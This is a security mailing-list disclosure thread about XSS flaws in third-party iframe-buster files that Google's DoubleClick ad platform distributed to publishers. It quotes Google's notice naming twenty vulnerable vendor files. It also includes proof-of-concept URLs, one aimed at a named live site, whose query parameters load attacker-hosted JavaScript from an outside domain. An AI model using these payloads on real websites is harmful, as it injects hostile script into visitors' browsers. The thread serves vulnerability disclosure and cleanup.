Re: Google supported XSS kit aka AdExchange iframe buster kit

[Zmx <larouanne () gmail com>]

Next step, email from DoubleClick <doubleclick-noreply () google com

Some more files to clean/check:

----
Dear Customer,

We’ve identified certain vendor files that may contain XSS vulnerabilities
which could pose a security risk. Please check if you are hosting these
files and remove them with the help of your webmaster. These are the
currently identified third-party vendor files:

1. adform/IFrameManager.html
2. admotion/afa-iframe.htm
3. bonzai/bonzaiBuster.html
4. exponential/buster.html
5. eyeblaster/addineyeV2.html
6. eyewonder/interim.html
7. flashtalking/ftlocal.html
8. ipinyou/py_buster.html
9. jivox/jivoxibuster.html
10. mediaplex/mojofb_v9.html
11. mixpo/framebust.html
12. predicta/predicta_bf.html
13. rockabox/rockabox_buster.html
14. liquidus/iframeX.htm
15. controbox/iframebuster.html
16. spongecell/spongecell-spongecellbuster.html
17. unicast/unicastIFD.html
18. adrime/adrime_burst.2.0.0.htm
19. revjet/revjet_buster.html
20. kpsule/iframebuster.html

We have disabled these vendors where possible for all DoubleClick for
Publishers and DoubleClick Ad Exchange customers. However, any of the
mentioned files hosted on your site may still pose a risk and should be
taken down. We will notify you as we learn more.

For more information please refer to this Help Center article.

Regards,
The DoubleClick for Publishers and DoubleClick Ad Exchange Teams

---------

Fun fact ?
You can probably use DoubleClick to help you found website where you can
"serve" XSS/expandable ads.

Tr4L


2017-12-19 17:09 GMT+01:00 Zmx <larouanne () gmail com>:

> Some more details:
>
> 1) The google article seems to link the problematic kit only in
> non-english local (check the french version or spanish one)
> 2) In order for predicta to work, you should host your javascript on a
> specific path: /mrm-ad/commons.js
>
>
> 2017-12-19 15:24 GMT+01:00 Zmx <larouanne () gmail com>:
>
> > Hi list,
> >
> > The DFP AdExchange service of Google (the service who provide ads) is
> > distributing an "Iframe Buster Kit" in order to allow iframe ads to expand
> > outside of the iFrame.
> >
> > This needs some bypass of the restriction applied to iframe, so Google
> > provide a kit to install on your website:
> > - Help Document: https://support.google.com/dfp_premium/answer/1074250
> > - Kit: https://storage.googleapis.com/support-kms-prod/DB3CE51
> > C3A5F783ED8198CDA753995FEB913
> >
> > The kit contains several html and js files to be hosted on your domains.
> >
> > Some of those files (still provide by Google, remember) contains very
> > visible XSS code:
> > One of them is "predicta" that simply allow you to pass the domain of
> > from where to load the javascript.
> >
> >
> > Quick proof of concept:
> > - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life
> >
> > As expandable ads allow website to gain more ads revenue, those kits is
> > present in a lot of website.
> >
> > Other "iframe buster kit" exist that are not provided by Google, and some
> > of them are also vulnerable.
> >
> > From my list I have:
> > - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
> > - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
> > - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look
> > like different version exist however)
> > - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js
> >
> >
> > Some source:
> > - Code of predicta_bf.html provide by Google in the kit:
> > https://pastebin.com/BggXDHNA
> > - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
> > - Code of rockabox: https://pastebin.com/xqhs3zyz
> >
> > Tr4L

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/